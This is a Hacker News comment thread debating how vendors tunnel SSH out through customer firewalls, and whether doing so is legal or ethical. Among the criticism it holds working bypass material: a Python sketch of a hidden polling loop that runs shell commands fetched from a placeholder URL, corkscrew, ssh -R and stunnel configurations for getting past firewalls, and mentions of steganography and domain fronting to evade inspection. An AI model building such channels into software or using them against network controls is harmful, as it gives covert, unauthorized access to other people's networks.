Firewall rules: not as secure as you think (haskellforall.com)
189 points by jnord 5 months ago | hide | past | favorite | 82 comments



The methods discussed in the article are how I have seen some hardware appliance vendors SSH into their devices despite the customer only allowing outbound connections to a cloud provider. I would call these out in security reviews and it would get political really fast, as the team buying the device wanted this feature, but the compliance team wanted the flows documented, which would conflict with security policies and ultimately cause an audit failure. It got even more interesting when one of the vendors was also a B2B customer. A firewall vendor claimed they could block anything inside that outbound HTTPS connection that was not HTTP, but they could not. I am not permitted to share specific details such as the appliance vendor or firewall vendor.

I would wager some companies don't even know that a vendor can SSH into the customer datacenter, not just the device, despite only allowing outbound HTTPS flows to a cloud provider.


I understand the technical issue, but in a broader sense, the instant a vendor-supplied black box is installed behind your firewall and allowed to make any sort of communication towards a vendor-controlled endpoint, doesn't that immediately, technically, allow full remote control?

Lots of talk about tunneling and wrapping/disguising SSH, but a vendor does not need any of that to control its machine.

For example, you could have the on-prem host poll a "licensing" or "software update" server that also happens to reply with ad-hoc commands to execute on demand. These could be straight-up shell commands, with the results sent back. No need for SSH, long-lived connections, reverse tunnels or anything.
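A minimal sketch of what such a covert command channel could look like (the URL and function names are hypothetical, purely for illustration):

```python
import subprocess
import urllib.request

# Hypothetical vendor-controlled endpoint; the URL is a placeholder.
SERVER_URL = "https://updates.example.com/license-check"

def run_remote_command(command: str) -> str:
    """Run whatever the 'licensing' server sent back and capture stdout."""
    result = subprocess.run(command, shell=True, capture_output=True, text=True)
    return result.stdout

def poll_once(url: str = SERVER_URL) -> str:
    # To any firewall, this is an ordinary outbound HTTPS "license ping".
    with urllib.request.urlopen(url) as resp:
        command = resp.read().decode()
    return run_remote_command(command)
```

Nothing here looks like a tunnel: it's a plain periodic HTTPS GET, indistinguishable from a real license check unless you can inspect the payload.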

The only way to mitigate this is to fully trust the vendor, have a strong legal framework to protect against wrongdoings or fully block all internet access to endpoints you don't fully control.


I understand where you are coming from, and that it should be assumed a vendor box can do anything even without SSH. Other teams don't think this way, however. "Oh, it's just outbound HTTPS, no inbound connections, totally fine" is the school of thought I was up against. Adding to this, the box was expected to send hundreds of GB of logs daily to do "big data" against to monitor its health, thus training firewalls, IDS and humans to expect this outbound data volume, which could, with the flip of a bit, start exfiltrating customer data. If I told you what this box was for, you would know how insane it would be to send more than 500KB per day for that purpose. It seems I share something in common with Boeing "line stoppers". There are details I wish I could share, as they would drive home how insane this entire debacle was. I expect to read about it in the news some day.


This is always the problem with firewalls. If your adversary controls both ends of the connection then it's not outbound HTTPS traffic you're letting through. It's totally arbitrary two-way traffic that happens to be transmitted over a connection first established to port 443 on the remote host.

The only useful technical defence against this kind of deception today is deep packet inspection and a policy of blocking everything by default and only permitting through packets you can actively approve. But that becomes very expensive very quickly and there are practical limits on how far you can go. Ultimately if your adversary is willing to engage covertly in the kind of hacks mentioned in the article then they're probably also willing to engage in steganography to get past whatever DPI rules you can afford to run. Then you're back to square one and either you trust their device or you sandbox it.

In reality a more effective defence is probably the one involving contracts with severe penalties for this kind of behaviour and liability for any consequential losses.


This is a good point. I would expect that a device like a SAN is just sending telemetry/logs/diagnostics back to the mothership for support purposes. Having a persistent tunnel kind of sucks, and I much prefer something like shell access being done over a remote support/screen sharing app so I can see what they are doing. Previous security fiascos like the SolarWinds hack come to mind, where an attacker could gain a foothold inside a trusted/internal network.


To be properly paranoid, I would allow the device to send telemetry and diagnostics, but only through my proxy. The outbound stream can be as encrypted as they want, but I will demand the ability to decode the answer, and decide whether I let it come back to the box.

I wonder how many vendors would agree to offer this, and how much more it would then cost.

(If you update software from the vendor's servers, all bets are off, because you are just running their software, which can do anything your security measures don't prevent it from doing. You have to very seriously trust the vendor of your OS if you may be a high-value target.)


If you’re big enough, they will. One company fought it, so I stopped paying them and they found Jesus.


That is more a case of that one vendor not having a diverse enough customer base, not of your company being big.


Nah. I’ve seen similar stunts pulled off with companies like Microsoft.

Sales teams who believe a full funnel is in front of them are capable of incredible feats. You need to have the air cover and willingness to scorch the earth.


They claim to need telemetry and diagnostics but do they sell to DoD?

Their thing can run air-gapped; they just prefer to be a quasi-SaaS because no one knows how to ship working software anymore.


But it's their device, you're installing it in your network - if they wanted to do something malicious, they would. If you shut down the tunneling method detailed in the article, they could just add an endpoint like:

GET /latest-command

that resolves to a shell script to be run periodically.

> start exfiltrating customer data

If it's data that they're supposed to have access to, they're already doing that. If it's data they're not supposed to have access to, the correct fix here is to DMZ the box they're installed on, not to try to (hopelessly) limit their outbound connectivity.


Sounds like a situation needing a whistleblower.


Hopefully not ending like the Boeing whistleblowers


> fully block all internet access to endpoints you don't fully control.

Not that all risk can be eliminated, but this simplifies management while reducing the attack surface area by orders of magnitude.

The good news is companies are increasingly doing it now that technology has finally caught up - now that implementing a private* network with each vendor (or a private extranet across all vendors) is actually viable and sensible.

* Usually a software-only, zero implicit trust overlay network


Are there overlay networks that are not software only?


All the cloud networks are software (defined network) a very long way down, far below what is exposed to customers, so any overlay is going to have to be software.

If you mean overlays that don't require an endpoint agent there are plenty of solutions that will orchestrate cloud native SDN control enforcement capabilities like AWS network ACLs or Azure NSGs rather then trying to handle enforcement on the resource directly with an agent.


I appreciate the response but I think you misunderstood my question. OP mentioned a "software-only, zero implicit trust overlay network". In my head all overlay networks are software only (and from your answer your conception too). I was trying to figure out why OP mentioned "software only"? Was it redundant or was it a useful way to distinguish between another category of overlay network.


> Are there overlay networks that are not software only?

In the defense and government security space there are 'hardware' overlay network devices. One common use is extending classified 'airgapped' networks over less secure networks or the internet. 'Inline Network Encryptor' is a generic term; 'Taclane' is one brand; HAIPE is I think an applicable NSA standard.


> I understand the technical issue, but in a broader sense, the instant a vendor-supplied black box is installed behind your firewall and allowed to make any sort of communication towards a vendor-controlled endpoint, doesn't that immediately, technically, allow full remote control?

In the sense of "isn't it now possible on technical level?", yes.

On a legal level? You're breaking into their network. At least in the US (but almost certainly in many other jurisdictions), there's a very non-zero chance you're engaged in illegal activity. https://www.justice.gov/jm/jm-9-48000-computer-fraud

On a PR level? Definitely not. The customer will be furious when they find out, and everyone who knows about it will tell everyone they know what you did, post about it on reddit/twitter/linkedin, not to mention discords and slacks. Even the helpdesk guys are gonna be telling their buddies over beers "you wouldn't believe what our netsec team caught our appliance from DumbassCo doing..."

That doesn't even get into the liabilities involved if the client has to meet security requirements from the government (as a contractor), PCI compliance, HIPAA compliance, SEC rules, etc. Imagine a client who needs compliance as a core part of their business losing it because of your network appliance...

And then there's the liability if the remote access capability turns out to be a security vulnerability that can be exploited by outside parties, is abused by an employee, or hackers break into your company and jump off from there to your clients.

There is nothing difficult about respecting "no, you may not have remote access to our network or this system" with no reason or justification provided. They don't need to justify or explain it to you. It's their network. Change the support contract terms if necessary, but don't do anything the author idiotically suggests.

I see people claiming that "it should be assumed the vendor can access your network" - legally speaking, no, it sure shouldn't. That's like saying "if you buy a laptop with a camera and microphone you should assume the laptop manufacturer can spy on you."

If you work at a company that does this sort of nonsense, now would be an excellent time to deactivate any "hack our way into customer-owned equipment or networks" functionality and urgently schedule a meeting with some lawyers.


> The customer will be furious when they find out, and everyone who knows about it will tell everyone they know what you did, post about it on reddit/twitter/linkedin, not to mention discords and slacks.

It wouldn't matter. People will bitch about it online for a few days and the company will make some lame PR statement about how sorry they are and that they'll take steps to prevent it from happening again but then everyone will move on to the next outrage and the company will continue to thrive.

Look at Lenovo: they've repeatedly shipped computers with malware and backdoors, sometimes because they were being paid to, and people still buy them. How many times have router manufacturers included the most brain-dead security flaws like hard-coded passwords and backdoors? How many companies have leaked private data to the world? Wells Fargo fraudulently opened accounts. HSBC laundered money for terrorists. Microsoft and Amazon were caught illegally harvesting data on children. Philips and Johnson & Johnson outright murdered people by continuing to sell products they knew were giving people cancer. Nobody went out of business. Even CrowdStrike is still around. The most universally hated companies in the US are also among the most successful.


Cisco has been found to have hard-coded credentials in their products... how many times now?


I mean, couldn’t any semi-popular, transitive dependency installed with <insert package manager here> do the same thing with a reverse tunnel? Imagine a simple Go module that kicks off a background goroutine that just keeps a tunnel open with a direct call to os/exec. Seems like an easy way to cat env and pipe secrets back to the attacker.


That's what I was thinking. Or any application at all. If MS Word started doing this, how long would it take to recognise? Especially if it's only periodic and only in some small percentage of their install base.


Yes.

This said, there are a few companies that monitor this kind of stuff in 'popular' open source packages and provide services to their customers to block packages that do things like this. Unfortunately it's pretty expensive.


Seriously, there were fights over that?

In any remotely reasonable organization, that should be an instant, permanent blacklisting for the vendor, and termination of the "we will escort you to clean out your desk right now" variety for any internal employee who knew about it or enabled it. Probably with a line dropped to law enforcement.


That strikes me as an example of how an extremely unreasonable organization would behave, regardless of what it was in response to.


What reasonable company have you worked for that had such an approach? The only place I could imagine it happening is at a boutique trading firm.


> A firewall vendor claimed they could block anything inside that outbound HTTPS connection that was not HTTP but they could not.

This is very easily bypassed by leveraging cert pinning. Modern firewalling is all predicated on a MitM approach; nobody has any secret sauce here. If they can't see inside the encryption, they really can't do much. Very few customers have decryption configured correctly, or at all, at scale.

Also, an enterprise generally won't block connections that "aren't categorized" (URL blocklist) because it's too much work / headache. Beyond that, most good and bad actors have domains lying around that won't end up in blocked categories.

NGFWs today are NGDSs (Next Gen Door Stops); they aren't effective beyond controlling their own users. And at that point, DNS is a much more cost-effective control.


> Also an enterprise generally won't block connections that "aren't categorized"

Depends where. I work with a lot of large enterprises and they absolutely do block everything. Anything leaving their data centers is proxied and allow-listed by the proxy. If we tried to cert-pin our application, it would immediately break in their environment and would not be allowed until it passed their policies.


There are still many ways around this. A proxy is only as good as the bypasses its administrators have thought of. Things like domain fronting are still easily leveraged. And most organizations won't touch financial websites with a 10-foot pole because of the legal implications of potentially decrypting PII. It's not impossible to get a domain classified as financial with a bit of work.

The unfortunate reality is all it takes is one.


You mention a couple times that you can't give more details. Can you say why? NDA?


Multiple NDAs, among other things.


Corkscrew, ohh that takes me back to the time I nearly got sacked. The GitHub repo is 8 years old, but corkscrew is much older.

I was working at a big place at the time. I had a fairly extensive home lab. I used to practice data migrations on synthetic data at home, provoke failures in my safe home lab env then write scripts to automate the migration while catching all the gotchas I could think of (think disk space filling up mid-migration, that kinda thing).

Anyway, I was using an ssh ProxyCommand and netcat (corkscrew makes this way simpler to do; I didn’t learn about corkscrew until afterwards) to punch through from my desk at work to my lab at home so I could copy in my scripts. Big no-no, but at the time that was not clear to me at all. I didn’t even consider I might be violating a rule.
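For the curious, the corkscrew version of this is a couple of lines of ssh config; the proxy and lab hostnames below are placeholders:

```
# ~/.ssh/config -- tunnel SSH through an HTTP CONNECT proxy with corkscrew.
# proxy.corp.example:8080 and homelab.example.net are placeholder names.
Host homelab
    HostName homelab.example.net
    ProxyCommand corkscrew proxy.corp.example 8080 %h %p
```

After that, a plain `ssh homelab` rides out through the corporate proxy as an ordinary CONNECT request.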

They flew a couple of “security officers” to the office I worked at to give me the full shake down… ooops!

A frustrating thing was that the people they flew out (at great expense, an international flight) were not that technical; one was an ex-cop, as I recall. Trying to explain what I was doing and how it worked was pretty tough! Actually, the most frustrating thing from my point of view was that in my mind I was showing initiative and doing all this free work outside of work, and here I was getting threatened with dismissal…


Amusing that you patronize corporate security for not totally understanding what you were doing, but couldn't deduce that tunneling home to grab your data exfiltration - I mean migration - scripts might not be kosher with security.


I didn't know the tool and it looks interesting; I'll give it a try.


This is billed as a means of selling customers on-prem stuff that you can remote-manage into with SSH despite firewall rules blocking SSH. You can do this. You can get a lot more sophisticated than the tricks outlined in this article to make it happen. It is very difficult for customers to prevent you from doing it. And, if you do it, you're going to get famous for doing it, when a customer that actually cares about your network security notices that you built a remote tunnel into their network.

I strongly advise anyone making product decisions to assume that none of these tricks work, and that there are no tricks you can use to build discreet remote management tunnels to devices (including hosts running your software) that have customer internal addresses assigned.


I've seen vendors offering this technique or similar, but making it "opt-in". For example, Okta Access Gateway used to perform a reverse tunnel out to an Okta managed IP, but you had to enable the "Support VPN" option on the device. https://help.okta.com/oag/en-us/content/topics/access-gatewa... Seems like they dropped the feature, not sure if from customer backlash, or their security engineering teams finally realizing that it's risky. However, it was at least documented, and customer toggleable.


I think that were I to implement anything like this I would document the capability explicitly.

The situation that seems useful to me is bypassing dysfunctional processes rather than circumventing inconvenient policies.

(and if the device in question can auto-apply updates, then so far as I can see, being able to ssh into it rather than ship it an update that Does Something is more a question of how convenient it is to Do The Thing than of adding any additional Things that it Can Do, though it's entirely possible I'm missing something important there)


For the SSH case mentioned in the article, the `ssh -R` trick should already cover some one-time contingencies (assuming the SSH connection is not blocked).

But if you find yourself requesting `ssh -R` too often, maybe just ask those datacenter people to set up a proper SSH bastion for you. There are open-source solutions and enterprise-level ones (Teleport, for example: https://github.com/gravitational/teleport), some of which also allow auditing and access control, which may be important if you work for an enterprise client.
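As a sketch, the one-off `ssh -R` version looks like this (bastion.example.com stands in for a host you control):

```
# On the target host: open a reverse tunnel that exposes its local
# sshd on port 2222 of the bastion (placeholder hostname).
ssh -N -R 2222:localhost:22 support@bastion.example.com

# Later, on the bastion, reach back through the tunnel:
ssh -p 2222 admin@localhost
```

The `-N` keeps the session open without running a remote command; the tunnel lives only as long as that session does, which is part of why it doesn't scale past one-time contingencies.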

The DIY solution described in the article literally punched a hole in the firewall. The firewall people might not like it.


Regarding SSH bastion hosts: apart from open-source and enterprise solutions that may add some valuable features, you can always get away with a properly configured SSH jump host that uses TCP forwarding to relay connections to the target host.
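A minimal version of that setup, with placeholder names and addresses, might look like:

```
# ~/.ssh/config on the operator's machine: hop through the jump host.
# jump.example.com and 10.0.5.20 are placeholders.
Host target
    HostName 10.0.5.20
    ProxyJump relay@jump.example.com

# And in /etc/ssh/sshd_config on the jump host: let the relay
# account forward connections but never get an interactive shell.
#
#   Match User relay
#       AllowTcpForwarding yes
#       PermitTTY no
#       ForceCommand /usr/bin/false
```

The `Match` block is what makes it "properly configured": the relay account can only be used as a pipe, not as a foothold.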


There is a problem with simple TCP forwarding: auditing. Some SSH bastions allow all input and output to be logged for later inspection and forensics, while DIY solutions often just ignore its importance.

Notice that I said "forensics"? Yeah, assuming some very unfortunate situation has occurred, the police are called and there will be a full incident report on it; a DIY'ed apparatus without detailed logging records will make the deployer of that apparatus look really bad. This is especially true if you're a contractor, since your hirer might not fully trust you.

Also, at the very least, you'd probably rather be mentioned as "the proficiency and diligence of one of our employees/partners allowed us to collect detailed information on what the attacker did on our systems" than "the lack of consideration in the use of a remote access tool made it impossible for us to know what else the attacker did". It's good for your resume.


Thorough auditing can still happen on the target host. If every single one of your hosts is properly configured to produce audit logs, maybe you can get away without auditing or even session recording on the SSH bastion host.


I can tell you that at scale, customers will notice this. They notice what DNS addresses you're hitting. They notice what outbound sockets you open. They notice the traffic patterns don't match the protocol you're putatively using. A given customer most likely will not, but there are networks out there where they're looking at pretty much every connection, and it only takes one bad interaction with one customer going to one press outlet for you to have a Bad Day. It's bad enough when the customer misunderstood something and you've got a good answer as to what is actually going on. You really don't want to be trying to do business in a scenario where you really were doing something like this.


> You (the vendor) can ask the customer to open their firewall for your software to communicate with the outside world (e.g. your own datacenter or third party services), but customers will usually be reluctant to open their firewall more than necessary.

Vendors that try tricks like this to work around the firewall team, as backlogged and inefficient as they are, will lose deals and credibility, 100% guaranteed. And I love ssh -R and stunnel, for what it's worth.
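For what it's worth, the stunnel variant of the trick is only a few lines of client config; the hostname below is a placeholder:

```
; stunnel client config (sketch): wrap an SSH session in TLS on port 443
; so it looks like ordinary HTTPS to an L3/L4 firewall.
; bastion.example.com is a placeholder for a host running the server side.
[ssh-over-tls]
client = yes
accept = 127.0.0.1:2222
connect = bastion.example.com:443
```

An SSH client then connects to 127.0.0.1:2222 and is none the wiser, which is exactly why this should only ever be done with the customer's knowledge.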

The easier way to get what you want is to get someone technical with political capital (they exist) to buy into what you're selling so that they can tell the firewall team to make exceptions during a trial period.


Just so that we are all on the same page: that is illegal and unethical.

A customer might have contradictory demands; that doesn't mean you should hack your customers with backdoors. These backdoors can also be used by others.

Although it's a neat trick, that doesn't mean it's ethical, legal, or desirable.

Think of it this way: what if every application/service you use created backdoors to your servers/devices?


This is basically a ridiculous arms race between the people making rules and the people who feel they are an exception to the rule. It can really suck when the reasoning on both ends is valid.


The worst bit is when it's happening because neither side wants to just sit down and discuss what's actually required and how to provide it securely.


"neither side"

This is not a coin, it's more like an octahedron.

You have the end user. You have the person at the company managing the application. You have the networking team. You have the edge and firewall teams. You have the security team. You have a compliance team. You have upper management looking at controlling costs.


I’ve had these types of conversations hundreds of times due to some architecture of various systems that I’ve worked on over the years. Mostly from the vendor side.

The only real way to combat this is to do Deep Packet Inspection (DPI) and then look at all the data being passed within that encrypted connection. The problem with this is that, at that point, the vendor has to trust that the customer is doing their due diligence to protect anything they find within that connection with the same diligence the vendor would.

As a vendor specifically in the healthcare space, I can tell you that there is no way in hell that I am going to trust any of our customers to secure our data, more than ourselves. They will never know or understand all of the components and know where the risks lie better than the vendor.

For example, in the infancy of one of the companies I worked at, I agreed with one of our customers to allow certificate interception: we would install their certificate on our servers, which would allow them to inspect the traffic. Wouldn’t you know it, there was an issue where they were blocking some of our outbound traffic because their deep packet inspection triggered some rule they had enabled. Conveniently, while they were pilfering through the data to troubleshoot the issue, they sent around a bunch of the payloads that contained various API keys, tokens, etc., which were now just out there in the wild; under our watch those would never have seen the light of day.

Who knows where else those things are logged, or what other places they reached besides the 30 or so recipients on that email thread. As soon as we found out that they were not handling it appropriately, we took corrective actions, not only replacing the keys but also disallowing that going forward. And this, for context, is one of the biggest healthcare institutions in the United States.

I can confidently say that I have a strong security mindset, and anything that gets built has security at the forefront of every release. You can’t trust people who aren’t liable for your systems with your data, or even to protect their own data.

Maybe I am jaded, but the lesson I learned is that you shouldn’t trust anybody, and that chances are other people will not treat sensitive information with the same sensitivity that you will.


> The only real way to combat this is to do Deep Packet Inspection (DPI)

Snake oil. It's not possible to be sure what's really going on in a connection where somebody else controls both endpoints, full stop. That's what this whole post is about.

> As a vendor specifically in the healthcare space, I can tell you that there is no way in hell that I am going to trust any of our customers to secure our data, more than ourselves.

What are "your" data doing on a device you don't physically control, in a network you don't control at all, all under the supervision of somebody you don't believe should have access to those data? Anything on there is "in the wild" already. It should have no ability to affect anybody but that customer and information that that customer would have access to regardless.

The security mindset should be telling you that your whole system needs to be rearchitected.


In that sort of scenario, the appliance needs to be in a DMZ and treated like an external system.

Personally, this is why I hate systems that need this sort of connectivity beyond a SAN service processor or similar. I’d rather have the third party just run it on their premises with appropriate contracts than pretend it’s just another server in the datacenter.


Firewalls. Because why fight hostile actors when you can just fight your teammates?

Firewalls, and the people behind them, are actively hostile to the company. They are relics from decades ago, when people could map the entire internet on their devices.

In 2024, this is nothing but a clown circus. They try to reconcile an ever-changing world with a never-changing world. So they make exceptions, thousands of exceptions; everything becomes an exception.

And then they think: hey, we are doing L3/L4, that is the issue! We fail because we are not L7.

And the circus comes around: corporate TLS MitM. Massive project; custom certificates must be deployed on each and every company device. Thus, exceptions, again more exceptions: what about this device? We cannot add our certs here. Exception. Ah, this specific thing cannot be MitM'ed (maybe they implemented certificate pinning? good guys). No problem: exceptions!

On top of that, all this cruft is expensive as hell. So we add more exceptions for stuff that is deemed "secure enough": Google Meet / Zoom / whatever. Various object storage services (S3 and friends). More exceptions.

At the end, you've spent millions and consumed thousands of FTE-hours on the project. To build a massive pile of exceptions (which basically allows everything, indeed).

The worst part is this: for every exception, you have someone who wants to work for the company, who is blocked from doing that work, who has to wait, argue and beg to finally be allowed to work for the company.

(source: experience; I'm a network architect and have worked for a couple of multi-billion-dollar companies)


> Firewall ... And then they think: hey, we are doing L3/L4, that is the issue! We fail because we are not L7.

Outside of corporate firewalls, these fractals reappear at the scale of nation-state firewalls.

What do you think of "zero-trust" and "software-defined perimeter" approaches where every network connection is linked to identity and risk assessment?


100%. Firewalls basically do nothing. If you are running vulnerable software, they won't help. If not, they're not helping either. They basically only help in the rare case that you have spectacularly misconfigured something. On the other hand, if a firewall is blocking automatic software updates, it's actually dramatically lessening security.


> exceptions (which basically allows everything, indeed)

No, that's not right.

You've allowed everything since the beginning. All the exceptions are for honest software; nothing malicious needs them.


We basically have to tunnel just to get our work done.

We host a number of services in China, serving the Chinese market, and our corporate firewall blocks our own access to them despite numerous requests to IT to resolve the issue.

We just use SSH to bounce off one of our EC2 instances to work on these.


This article talks about using Squid. I wouldn't recommend Squid for this, as they're understaffed and took years to fix critical vulnerabilities I found[0].

Using SSH-over-HTTPS with ssh -R works wonders everywhere, though. You could probably even make the SSH packets look like HTML so they're opaque to a MitM proxy too.

The sort of firewalls this post is discussing are close to snake oil imo. Sure they help with automated script kiddie attacks and whatnot, but yes, if you control both ends, it's nearly always possible to connect back.

0: https://megamansec.github.io/Squid-Security-Audit/


Most security controls used in your average business can be bypassed by knowledgeable users with enough time.

The aim is to make things as hard as reasonably possible so you can tell your boss and regulators that you did your part.


The problem is, most organizations - particularly large ones, but following the advent of "cyber insurances" also more and more smaller ones - drown in byzantine bureaucracy and requirements that makes work excessively difficult.

Any organization depends on people willing to bend, stretch and bypass the rules where necessary - refusing to do so is considered to be a form of labor action [1].

[1] https://en.wikipedia.org/wiki/Work-to-rule


This is made to sound much more malicious than it is. Sometimes these techniques are used just because you don't want your product to have open ports, which could be potential entry points for uninvited guests. As long as the client knows about the connection and what it entails, it should be okay.

The product of my employer is remote monitoring and management, so the nature of the product is to allow cloud visibility into a network, and the reverse connection actually improves security.


This makes me grimace. I recall trying to install an SSL cert inside a very restricted environment. I had to build a special mode into our application so the IT person could use cURL to hit an endpoint with the base64'd cert, then scan the log files for the chunks and reassemble them by hand with vi. Imagine coaching someone who only knows how to click around in Windows to use vi and bash and grep; everyone feels like a complete idiot. They completely disabled all ports other than HTTPS and did not allow copy-paste into the VM. Inbound HTTP was disabled (so no wget; we couldn't even install extra software with yum). What a nightmare.

The irony of these locked down environments is that they are put in place by crusty IT people who have good intentions, but also know it helps them keep their jobs. But, because of it, all the on-premise software is moving to the cloud, and those people are going to lose their jobs anyway.

This was a sad realization I found after years of enterprise sales work. I thought on-premise software could give us an advantage because as a small company you can offer a more bespoke experience. But, we always looked bad because everyone fights to protect their fiefdom, and our software was blocked at every turn.

It is crazy that enterprises are moving everything to the cloud and no one notices that the barrier to accessing their private, sensitive data is now more or less water vapor. That's nuts.


Which is why you need a modern firewall that MitMs both TLS and SSH. Not hard to do these days.


I don't think a modern firewall can MitM HTTPS without triggering a "Warning: Potential Security Risk Ahead" (Firefox) or "Your connection is not private" (Chrome) warning.

Edit: typo


I don't think _any_ firewall can MITM traffic without this happening unless you install the appropriate certificate in each client machine's trust store. I bet that with the advent of such all-in-one solutions as Fortinet or Cisco VPNs that this would be handled automatically. If not I'm sure an endpoint management solution could be coaxed into doing this via some glue scripts. I haven't been an "IT guy" in a decade-plus but I'd be surprised if this wasn't within reach fairly easily these days.


Sophos does that, in fact. I did a double take when I noticed the certificates for my domains weren't issued by Let's Encrypt on my work machine.


Yeah, that's what the IT at my company did. Installed Zscaler, rolled out a new root cert to Chrome, and then told people to configure the remaining apps they use to use the organization's root cert.


Which is why corporates who do this also use MDM to ensure that certs for the firewall/reverse proxy are installed on endpoints, RADIUS at network access points to authenticate devices by certificates and endpoint protection software to send nasty-grams if you fuck around.


That’s been my experience. The difference being in a corporate environment they can push policies to all employee endpoints that make this happen with no scary warning (trust the internal CA, etc).


Regarding SSH, the MitM would generate a new host key for the actual host you try to connect to. That means that if the MitM was already in place when you first trusted the host key (adding it to your known_hosts), you will not get any additional security warning.

This can of course be avoided if the organization distributes host keys to clients beforehand, as they (maybe) would if the host keys were the actual keys from /etc/ssh on the host.
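For illustration, pre-distribution usually means collecting the real keys out-of-band (e.g. with ssh-keyscan from a trusted path, or by copying /etc/ssh/ssh_host_*.pub) and shipping a system-wide known_hosts plus a client config that refuses anything else. A rough sketch, where hostnames and paths are examples:

```
# /etc/ssh/ssh_config fragment pushed to managed clients:
Host *.internal.example.com
    # Only accept host keys distributed ahead of time; never prompt.
    StrictHostKeyChecking yes
    GlobalKnownHostsFile /etc/ssh/ssh_known_hosts
    UserKnownHostsFile /dev/null
```

With this in place, a MitM presenting a freshly generated host key produces a hard failure instead of a first-use trust prompt.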


Correct. Companies that implement such a firewall must also install their own trust stores on the machines on the network. This can be a problem when you try to use some software that uses its own trust store from a public source like Mozilla (e.g. Python libraries).

It really makes you think how much your security hinges on that trust store yet it's something most people aren't even aware exists, let alone inspected themselves.
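To make the point concrete, here is a small sketch (the CA bundle path is a made-up example) showing that Python's stdlib uses the system trust store - where an MDM-installed MitM CA would live - while libraries bundling their own store (e.g. certifi, which ships Mozilla's CA list) must be redirected explicitly:

```python
import os
import ssl

# ssl.create_default_context() loads the *system* trust store, which is
# where a corporate MitM CA would typically be installed via MDM.
ctx = ssl.create_default_context()
print(ctx.verify_mode == ssl.CERT_REQUIRED)  # chain verification is on
print(ctx.check_hostname)                    # hostname checks are on

# Libraries that bundle their own store (anything using certifi) bypass
# the system store unless pointed at the corporate bundle, commonly via
# environment variables like these (the path is hypothetical):
os.environ["SSL_CERT_FILE"] = "/etc/ssl/corp-ca-bundle.pem"       # OpenSSL-based tools
os.environ["REQUESTS_CA_BUNDLE"] = "/etc/ssl/corp-ca-bundle.pem"  # requests
```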


Pretty sure you still can, it just requires that the client system trusts the CA being used to sign the MITM certs. That obviously limits the cases where it works, but not to zero.


Because this has been abused, a lot of (mobile) apps use certificate pinning and will not accept MITM, even with a custom CA installed.
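One common form of pinning is comparing the server certificate's SHA-256 fingerprint against a hard-coded value, on top of normal chain validation. A rough stdlib-only sketch (the pinned value is a placeholder, not a real fingerprint):

```python
import hashlib
import socket
import ssl

# Placeholder: in a real app this is the known-good SHA-256 hex digest
# of the server's DER-encoded certificate.
PINNED_SHA256 = "<known-good-sha256-hex>"

def cert_fingerprint(der_bytes: bytes) -> str:
    """SHA-256 fingerprint of a DER-encoded certificate."""
    return hashlib.sha256(der_bytes).hexdigest()

def connect_pinned(host: str, port: int = 443) -> ssl.SSLSocket:
    """Open a TLS connection and refuse it if the leaf cert isn't pinned."""
    ctx = ssl.create_default_context()  # still does normal chain validation
    sock = ctx.wrap_socket(socket.create_connection((host, port)),
                           server_hostname=host)
    der = sock.getpeercert(binary_form=True)
    if cert_fingerprint(der) != PINNED_SHA256:
        sock.close()
        raise ssl.SSLError("certificate fingerprint mismatch (possible MitM)")
    return sock
```

A MitM box that re-signs traffic with a custom CA passes chain validation on a managed endpoint, but fails the fingerprint check, which is why pinned apps break behind such firewalls.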


I don't for a moment believe that that's the reason (more likely, it's the apps trying to prevent reverse engineering), but yes, there's a bit of a cat/mouse game where you can read traffic but HTTPS prevents that but you can add a custom CA but apps can pin certs but you can modify the app to fix that. But I suspect that for the appliance case, a business can just require that the vendor allow a custom CA and block any traffic they can't decrypt.


In cases where I trust both the communication endpoints, e.g. an employee trying to SSH into an internal host, "trust" being established by other parameters that are not relevant to the firewall, why would I MitM such a connection?

At work I use a VPN to access the internal network, I then have to traverse multiple firewalls and a MitM breaking up my SSH connection in order to connect to a host running a webserver.

I have yet to understand how the MitM would increase security. Extra (well minus) points if the appliance in question auto-updates from the vendor's repository, offering no insight into the inner workings.


Do they always work? Can't they pin certs?


They can pin certs, but at least you know that you can't see that traffic and make a policy decision about allowing it anyways or trying to force the vendor to drop it.


The next level is to add another layer of encryption and wrap that inside the TLS/SSH stream, perhaps with steganography to make it appear legitimate. Much harder to detect.


That stuff fundamentally does not work against anybody with enough of a clue to be playing tunneling games (or using ssh) in the first place. If you have any significant control over both ends of the connection, then it's trivial to obfuscate anything you want so that the firewall can't detect it.

... and those boxes, all of them, have a really bad history of security bugs themselves.

The risks you're taking by undermining the cryptography and putting random unnecessary devices in positions of trust are almost always greater than the risks you mitigate. What you're really buying with those devices is the illusion of control and/or the ability to claim you "tried".


Just to be pedantic, a malicious user could write a script/program that implements tunneling but doesn't use the OS-provided certificates.

But yeah that's definitely a best practice.


The article says that Squid can only do HTTP, and suggests to add a reverse proxy in front of Squid for HTTPS, but doesn't Squid support HTTPS itself via "SSL bump"?
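For what it's worth, Squid (when built with OpenSSL support) can intercept HTTPS via its SslBump feature. A rough sketch of the relevant squid.conf directives, where the CA path is an example and clients must trust that CA:

```
# squid.conf - requires a Squid build with --with-openssl
http_port 3128 ssl-bump \
    tls-cert=/etc/squid/mitm-ca.pem \
    generate-host-certificates=on

acl step1 at_step SslBump1
ssl_bump peek step1      # read the TLS ClientHello/SNI first
ssl_bump bump all        # then impersonate the origin server
```

So a separate reverse proxy isn't strictly necessary for HTTPS inspection, though the article's setup may have other reasons for the split.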


Doesn't Tailscale also do a similar thing, where you never open any port on your server but can still SSH into it as long as the daemon is running on the server?


I don't think repeatedly referring to gaining unauthorised access to a network as a "trick" would trick a judge (or corporate lawyers) much at all...



